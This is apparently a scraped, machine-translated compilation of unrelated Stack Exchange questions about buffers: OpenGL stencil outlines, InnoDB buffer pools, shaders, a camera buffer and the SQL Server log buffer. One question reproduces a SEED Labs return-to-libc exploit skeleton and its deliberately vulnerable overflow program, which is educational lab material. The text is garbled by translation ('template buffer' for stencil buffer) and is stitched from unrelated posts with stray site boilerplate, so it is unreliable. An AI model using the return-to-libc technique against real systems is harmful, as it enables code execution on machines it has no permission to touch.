opengl – discard GLSL fragment values ​​that do not work with the template buffer

I'm trying to create a system that I can use to sketch sprites, but I can only make it work if I use a normally shaped texture. This is what an outlined regular texture looks like:

Work outline

However, here is an irregular texture with the same outline code:

broken outline

I have to say that the broken outline does Use changed texture coordinates, but this shouldn't matter because all pixels with alpha = 0 are discarded (the second image is transparent to the person) should Prevent the template buffer from receiving them. However, the template buffer continues to count the rejected pixels as "written". Here are my shaders that we are all the same across the two textures:

Texture vertex:

#version 330 core
layout (location = 0) in vec3 aPos;
layout (location = 1) in vec2 aTexCoord;

out vec2 TexCoord;

uniform mat4 transform;
uniform mat4 view;
uniform mat4 projection;

void main()
{
    gl_Position = projection * view * transform * vec4(aPos, 1.0);
    TexCoord = aTexCoord;
}

Texture fragment:

#version 330 core
out vec4 FragColor;

in vec2 TexCoord;

uniform sampler2D ourTexture;
uniform vec4 color;

void main()
{
    FragColor = texture(ourTexture, TexCoord) * color;
    if (FragColor.a == 0) discard;
}

Outline fragment (paired with texture vertex):

#version 330 core

out vec4 fragColor;

uniform vec4 color;

void main() {
    fragColor = color;
    if (fragColor.a == 0) discard;
}

Finally, here is the common render code:

void c2m::client::gl::Sprite::render() {
    // Set shader uniforms if the shader is initialized
    if (shader != nullptr) {
        if (outlineWidth > 0) {
            glStencilFunc(GL_ALWAYS, 1, 0xFF);
            glStencilMask(0xFF);
        }

        applyTransforms();
        // Texture vertex and fragment
        shader->useShader();
        shader->setMat4("transform", trans);
        shader->setVec4("color", color.asVec4());
    }

    // Rebind the VAO to be able to modify its VBOs
    glBindVertexArray(vao);

    // Reset vertex data to class array
    glBindBuffer(GL_ARRAY_BUFFER, vbo);
    glBufferSubData(GL_ARRAY_BUFFER, 0, sizeof(vertices), vertices);
    glBindBuffer(GL_ARRAY_BUFFER, 0);

    // Bind texture
    tex->bind();

    // Draw
    glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, ebo);
    glDrawElements(GL_TRIANGLES, 6, GL_UNSIGNED_INT, 0);

    // If the outline width is 0 return
    if (outlineWidth == 0) {
        return;
    }

    // Draw outline
    if (outlineShader != nullptr) {
        glStencilFunc(GL_NOTEQUAL, 1, 0xFF);
        glStencilMask(0x00);
        glDisable(GL_DEPTH_TEST);
        // Texture vertex and outline fragment
        outlineShader->useShader();

        outlineShader->setVec4("color", outlineRGBA.asVec4());
        // Temporary transform matrix to prevent pollution of user-set transforms
        glm::mat4 tempTransform = trans;
        tempTransform = glm::scale(tempTransform, glm::vec3(outlineWidth + 1, outlineWidth + 1, outlineWidth + 1));
        outlineShader->setMat4("transform", tempTransform);
        glDrawElements(GL_TRIANGLES, 6, GL_UNSIGNED_INT, 0);

        glStencilMask(0xFF);
        glEnable(GL_DEPTH_TEST);
        glStencilFunc(GL_ALWAYS, 1, 0xFF);
    }
}

Here is my template buffer initialization code:

// Stencil
glEnable(GL_STENCIL_TEST);
// Disable stencil writing by default, to be enabled per draw cycle
glStencilFunc(GL_NOTEQUAL, 1, 0xFF);
glStencilOp(GL_KEEP, GL_KEEP, GL_REPLACE);

Am I doing something wrong in my texture fragment shader that doesn't properly discard transparent pixels, haven't I configured the template buffer correctly, or have I missed something somewhere else?

Mathematics – Accurate normal reconstruction from depth buffer

I am trying to reconstruct normals from the depth buffer using this method: https://atyuwen.github.io/posts/normal-reconstruction/

But I think that I am missing something when calculating the derivatives.

Enter the image description here

This is how I deal with the entire reconstruction based on the method.

Any idea what's going wrong?

// This is how position is reconstructed
float3 reconstructPosition(float2 uv, float z, float4x4 InvVP)
{
    float x = uv.x * 2.0f - 1.0f;
    float y = (1.0 - uv.y) * 2.0f - 1.0f;
    float4 position_s = float4(x, y, z, 1.0f);
    float4 position_v = mul(InvVP, position_s);
    return position_v.xyz / position_v.w;
}

// This is how the normal is reconstructed
float2 uv0 = projection.xy / projection.w;
float depth = Linear01Depth(SAMPLE_DEPTH_TEXTURE(_CameraDepthTexture, sampler_CameraDepthTexture, uv0), _ZBufferParams);

float2 uv1 = uv0 - float2(1.0 / _CameraDepthTexture_TexelSize.z, 0);
float2 uv2 = uv0 + float2(1.0 / _CameraDepthTexture_TexelSize.z, 0);
float2 uv3 = uv0 - float2(2.0 / _CameraDepthTexture_TexelSize.z, 0);
float2 uv4 = uv0 + float2(2.0 / _CameraDepthTexture_TexelSize.z, 0);

float4 H;
H.x = Linear01Depth(SAMPLE_DEPTH_TEXTURE(_CameraDepthTexture, sampler_CameraDepthTexture, uv1), _ZBufferParams);
H.y = Linear01Depth(SAMPLE_DEPTH_TEXTURE(_CameraDepthTexture, sampler_CameraDepthTexture, uv2), _ZBufferParams);
H.z = Linear01Depth(SAMPLE_DEPTH_TEXTURE(_CameraDepthTexture, sampler_CameraDepthTexture, uv3), _ZBufferParams);
H.w = Linear01Depth(SAMPLE_DEPTH_TEXTURE(_CameraDepthTexture, sampler_CameraDepthTexture, uv4), _ZBufferParams);

float2 he = abs(H.xy * H.zw * rcp(2.0 * H.zw - H.xy) - depth);
float3 hDeriv;
if (he.x > he.y)
{ hDeriv =  reconstructPosition(uv3, H.z, UNITY_MATRIX_I_VP) - reconstructPosition(uv1, H.x, UNITY_MATRIX_I_VP); }
else
{ hDeriv =  reconstructPosition(uv2, H.y, UNITY_MATRIX_I_VP) - reconstructPosition(uv4, H.w, UNITY_MATRIX_I_VP); }

uv1 = uv0 - float2(0, 1.0 / _CameraDepthTexture_TexelSize.w);
uv2 = uv0 + float2(0, 1.0 / _CameraDepthTexture_TexelSize.w);
uv3 = uv0 - float2(0, 2.0 / _CameraDepthTexture_TexelSize.w);
uv4 = uv0 + float2(0, 2.0 / _CameraDepthTexture_TexelSize.w);

float4 V;
V.x = Linear01Depth(SAMPLE_DEPTH_TEXTURE(_CameraDepthTexture, sampler_CameraDepthTexture, uv1), _ZBufferParams);
V.y = Linear01Depth(SAMPLE_DEPTH_TEXTURE(_CameraDepthTexture, sampler_CameraDepthTexture, uv2), _ZBufferParams);
V.z = Linear01Depth(SAMPLE_DEPTH_TEXTURE(_CameraDepthTexture, sampler_CameraDepthTexture, uv3), _ZBufferParams);
V.w = Linear01Depth(SAMPLE_DEPTH_TEXTURE(_CameraDepthTexture, sampler_CameraDepthTexture, uv4), _ZBufferParams);

float2 ve = abs(V.xy * V.zw * rcp(2.0 * V.zw - V.xy) - depth);
float3 vDeriv;
if (ve.x > ve.y)
{ vDeriv =  reconstructPosition(uv3, V.z, UNITY_MATRIX_I_VP) - reconstructPosition(uv1, V.x, UNITY_MATRIX_I_VP); }
else
{ vDeriv =  reconstructPosition(uv2, V.y, UNITY_MATRIX_I_VP) - reconstructPosition(uv4, V.w, UNITY_MATRIX_I_VP); }

float3 normal = cross(vDeriv, hDeriv);
normal.z = -normal.z;
normal = normalize(normal) * 0.5 + 0.5;
return normal;

Partitioning and the InnoDB buffer pool

I am trying to manage a database with a table with 40 billion rows (7.2 terabytes) on a server, using InnoDB as the storage engine and MariaDB with MySQL 5.5.

When my database reaches approximately 2.5 terabytes, I can no longer insert data into the table at the rate required in production. Data in the table is rarely queried after 24 hours. The table has a primary key and a secondary index. After doing some research, it seems important to understand the InnoDB buffer pool if I want to solve this problem. This is obviously too much data to fit in the buffer pool. I have some ideas on how I can improve performance by increasing the likelihood that data from the past 24 hours will be stored in the buffer pool, but it is difficult to test them all with such a large amount of data. How does the InnoDB buffer pool behave in the following situations? Is an idea obviously better? Or are they all bad?

  1. Divide the large table into partitions by time so that the data and index of each partition fit into the buffer pool. – https://mariadb.com/kb/en/partition-maintenance/ suggests that this should improve performance, but I've seen conflicting information about how indexing works for partitioned tables. Is it a massive index? Or several smaller indexes that fit in the buffer pool? If it is a large index, it is difficult to see how this would help.
  2. Create 2 time partitioned tables. A table is a large table with archived partitions, and a table contains only one "active" partition with data that is likely to be queried (possibly a week). When I move to the next partition in the active table (data for the next week), I swap the last active partition (data for the last week) into the archive table. – This seems to be advantageous because the active table is guaranteed to fit in the buffer pool and queries that may be performing a full table scan will not read data that will delete the active data from the buffer pool because the old data is in a different table. However, I assume that when the recently active partition is replaced in the archive table, everything comes to a standstill, while the index for the large table is read from the hard disk into the buffer pool and recalculated. Then it will take some time before the performance suffers before the active data gets back into RAM.
  3. Create a time-partitioned table with archived data and a small table with minimal size (probably 24 hours worth of data). Then copy the data that is more than 24 hours old from the small table into the partitioned archive table. – I can hardly imagine how this could be a good option when copying data is no faster than moving an entire partition.

Any insight is greatly appreciated!

How to find the buffer offset for Return to Libc Attack

I'm trying to find the buffer to implement my Seedlabs buffer attack on

The lab link is also here: https://seedsecuritylabs.org/Labs_16.04/PDF/Return_to_Libc.pdf

How do I find X Y Z in a Return To Libc attack with a buffer of 150?
This is the exploit code we were given. I have already found the addresses to which the buffers have to write, but I only need the X Y Z:


#include 
#include 
#include 

int main(int argc, char **argv) {

    char buf(40);
    FILE *badfile;
    badfile = fopen("./badfile", "w");

/* You need to decide the addresses and the values for X, Y, Z. The order of the following three
statements does not imply the order of X, Y, Z. Actually, we intentionally scrambled the order. */

    *(long *) &buf(X) = 0xbffffdd4; // /bin/sh

    *(long *) &buf(Y) = 0xb7e42da0; // system()

    *(long *) &buf(Z) = 0xb7e369d0; // exit()

    fwrite(buf, sizeof(buf), 1, badfile);

    fclose(badfile);

}

This is also the vulnerable program that we were given:


#include 
#include 
#include 

/* Changing this size will change the layout of the stack. * Instructors can change this value each
year, so students * won’t be able to use the solutions from the past. * Suggested value: between 0
and 200 (cannot exceed 300, or * the program won’t have a buffer-overflow problem). */

#ifndef BUF_SIZE
#define BUF_SIZE 150
#endif

int bof(FILE *badfile) {

    char buffer(BUF_SIZE);

    /* The following statement has a buffer overflow problem */ fread(buffer, sizeof(char), 300, 
    badfile);

    return 1;

}

int main(int argc, char **argv) {

    FILE *badfile;

    /* Change the size of the dummy array to randomize the parameters for this lab. Need to use the array         
    at least once */

    char dummy(BUF_SIZE*5); memset(dummy, 0, BUF_SIZE*5);

    badfile = fopen("badfile", "r");

    bof(badfile);

    printf("Returned Properlyn");

    fclose(badfile);

    return 1;

}

directx – If I use the vertex shader to perform all operations on the object, can the constant buffer be empty?

The program cycle is

Update();
UpdatePipeline();

in the Update() Constant buffer for every object that has copied this object world matrix into the GPU upload heap after transformations. And in UpdatePipeline()Among other things, installed shaders are called. Since we do all matrix transformations with CPU, the vertex shader only returns the position, right? If so – is it true that performance is increasing?

Now I want to do all the transformations with the GPU, i.e. H. About the vertex shader. It means that in Update() I should just call memcpy() with an empty constant buffer as the source?

mysql – How is the innoDB buffer released?

The usual use of the InnoDB buffer pool is to make frequently requested pages more accessible. However, I have a huge database with ~ 10 TB and 32 GB buffer pool that is used for data analysis. I keep writing to the database and doing calculations. There is no frequently requested page other than the indexes.

I also hired InnoDB

innodb_change_buffer_max_size=50
innodb_buffer_pool_load_at_startup=OFF
innodb_buffer_pool_dump_at_shutdown=OFF

because I don’t need to warm up because I’m working with different records on different tables (even databases). There is almost no repeated polling in a period in which the buffer pool can keep the relevant pages.

The problem is that my buffer is quickly filled with pages that I don't need. Instead, the free buffers go to ~0 (while the dirty pages are ~ too0) and the system becomes slow until I reboot to release the buffer pool.

How can I set InnoDB to use the buffer effectively? For example, by deleting old pages that have not been used for a certain time?

Performance – Olympus OM-D E-M1 Mark III: Is there a way to determine the number of exposures remaining in continuous shots before the buffer fills up?

Many interchangeable lens cameras offer some kind of buffer capacity indicator during recording, which typically shows the approximate number of images that can be stored in the buffer, and therefore how many more images can be captured in continuous mode before the camera slows down:

However, I cannot find a similar function on my Olympus OM-D E-M1 Mark III. Is there such a function in the camera? If so, where can I activate it? I've already reached Olympus also on Twittervia a display function for the buffer capacity.

Denial of service – difference between integer overflow, buffer, stack, heap and cache overflow and the nuance of criticality with regard to the system

Stack Exchange network

The Stack Exchange network consists of 175 Q&A communities, including Stack Overflow, the largest and most trusted online community, where developers can learn, share their knowledge, and build their careers.

Visit Stack Exchange

backup – What is the transaction log buffer in SQL Server for?

I have a question like why do we use in the transaction log buffer.

As SQL Server places the transaction log in the transaction log buffer, when the checkpoint is run, it transfers the bad pages (committed) and the logs to disk (.mdf / .ldf).

So there must be no active log in the actual transaction log file. All transactions are waiting for the backup process.

Thank you in advance.